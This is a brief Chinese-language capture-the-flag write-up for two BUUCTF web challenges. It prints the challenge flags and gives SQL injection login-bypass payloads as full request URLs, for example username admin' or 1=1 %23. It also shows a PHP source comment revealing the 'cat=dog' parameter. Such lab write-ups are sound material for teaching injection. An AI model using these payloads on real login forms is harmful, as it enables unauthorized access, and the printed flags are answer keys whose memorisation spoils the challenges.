BUUCTF_WEB_20200914

WEB-[极客大挑战 2019]EasySQL1

1.打开后先用amdin/admin尝试，返回错误的用户名密码

2.之后admin后加'刺探一波，返回：You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''admin''' at line 1

之后再尝试一波万能密码：admin' or '1'='1还是返回错误的用户名密码

3.没出结果，但是这里肯定是用注入的，接着使用，第二种，不去判断密码的正确性。http://fef71e4d-9851-46e9-a55a-5a827df467fe.node3.buuoj.cn/check.php?username=admin' or 1=1 %23&password=1

4.还有一种办法，直接再密码处用一次万能密码http://fef71e4d-9851-46e9-a55a-5a827df467fe.node3.buuoj.cn/check.php?username=admin&password=admin%27%20or%20%271%27=%271

flag

flag{aad4bda2-1d72-47d0-b133-1d025e80b4aa}

WEB-[极客大挑战 2019]Havefun1

1.拿到题后F12得到：

  <!--
        $cat=$_GET['cat'];
        echo $cat;
        if($cat=='dog'){
            echo 'Syc{cat_cat_cat_cat}';
        }
        -->

接着构造参数?cat=dog得到flag

flag

flag{09c2aece-9347-48d0-8eb6-768b15724864}